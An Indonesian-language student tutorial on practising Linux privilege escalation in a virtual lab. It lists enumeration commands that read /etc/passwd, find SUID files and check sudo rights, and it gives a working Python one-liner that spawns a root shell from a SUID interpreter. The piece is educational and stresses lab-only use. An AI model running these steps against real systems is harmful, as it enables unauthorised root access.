Dalam dunia keamanan komputer, salah satu hal yang perlu dipahami oleh ethical hacker atau sysadmin adalah privilege escalation. Ini adalah teknik untuk meningkatkan hak akses di sistem, misalnya dari pengguna biasa menjadi administrator (root).

Sistem operasi Linux sering digunakan untuk latihan karena banyak tools gratis tersedia dan strukturnya terbuka. Artikel ini akan membahas bagaimana cara melakukan simulasi privilege escalation di Linux langkah demi langkah, secara aman dan legal.

 

Persiapan Sebelum Mulai

Sebelum praktik, pastikan:

✅ Kamu tidak melakukan ini di komputer orang lain atau di server nyata. Hanya lakukan di lab pribadi atau simulasi virtual.

Alat yang Diperlukan:

  • Kali Linux: digunakan untuk menyerang (attacker)
  • Target Linux: seperti Metasploitable, Ubuntu, atau Debian yang sudah disiapkan untuk latihan
  • VirtualBox / VMware: untuk membuat simulasi lingkungan
  • Tools Privilege Escalation:
    • LinPEAS (otomatisasi pencarian celah)
    • Perintah bawaan Linux seperti sudo, find, id, ps, dan getcap

 

Langkah-Langkah Praktik Privilege Escalation di Linux

1. Kumpulkan Informasi Sistem

Pertama, kita perlu tahu sistem seperti apa yang sedang kita akses:

whoami        # melihat nama user sekarang
id            # melihat hak akses user
uname -a      # info kernel dan OS
cat /etc/os-release  # detail OS

Juga lihat siapa saja user di sistem:

cat /etc/passwd
groups

2. Enumerasi (Cari Celah Keamanan)

Setelah tahu info dasarnya, kita mulai cari celah:

  • Cek sudo access:
sudo -l

Lihat apakah user bisa menjalankan perintah tertentu tanpa password.

  • Cari file SUID (berbahaya jika disalahgunakan):
find / -perm -4000 2>/dev/null
  • Cek proses yang berjalan:
ps aux
  • Cek cron job (jadwal otomatis):
crontab -l
cat /etc/crontab
  • Gunakan LinPEAS untuk mempercepat pencarian:

Download dan jalankan LinPEAS di sistem target:

./linpeas.sh

3. Eksploitasi Celah yang Ditemukan

Setelah kita tahu celahnya, waktunya praktik. Beberapa contoh umum:

Cron Job Salah Konfigurasi
Kalau cron menjalankan file yang bisa kita edit, kita bisa masukkan perintah untuk membuka akses root.

File SUID Berbahaya
Misalnya, ditemukan Python dengan SUID:

/usr/bin/python

Kita bisa jalankan shell dengan root:

python -c 'import os; os.setuid(0); os.system("/bin/bash")'

Sudo tanpa password
Jika sudo -l menunjukkan kita bisa menjalankan nano, vi, atau python sebagai root tanpa password, kita bisa pakai itu untuk akses penuh (lihat di situs GTFOBins).

File Capabilities
Gunakan perintah:

getcap -r / 2>/dev/null

Kalau ada file Python dengan kemampuan cap_setuid+ep, kita bisa gunakan untuk naik ke root.

4. Validasi Akses

Setelah eksploit berhasil, pastikan hak akses kita sudah berubah:

whoami
id

Kalau hasilnya root, maka privilege escalation berhasil.

 

Tips Praktik yang Aman

🛑 Selalu gunakan snapshot sebelum eksperimen, supaya mudah dikembalikan kalau sistem rusak.
📝 Catat langkah-langkahmu untuk bahan belajar.
🔒 Jangan pernah praktik di server milik orang lain.
🧠 Ikuti perkembangan teknik baru dari forum keamanan, blog, atau GitHub.

 

Kesimpulan

Privilege escalation adalah salah satu keterampilan penting dalam keamanan Linux. Dengan latihan secara langsung dan bertanggung jawab, kita bisa belajar bagaimana sistem bisa dieksploitasi — dan tentu saja, bagaimana cara melindunginya.

Belajar privilege escalation bukan berarti jadi hacker jahat, tapi untuk melindungi sistem agar tidak diserang orang lain.

 

 

Nama: Damarudin
NIM: 23156201034
Prodi: Sistem Komputer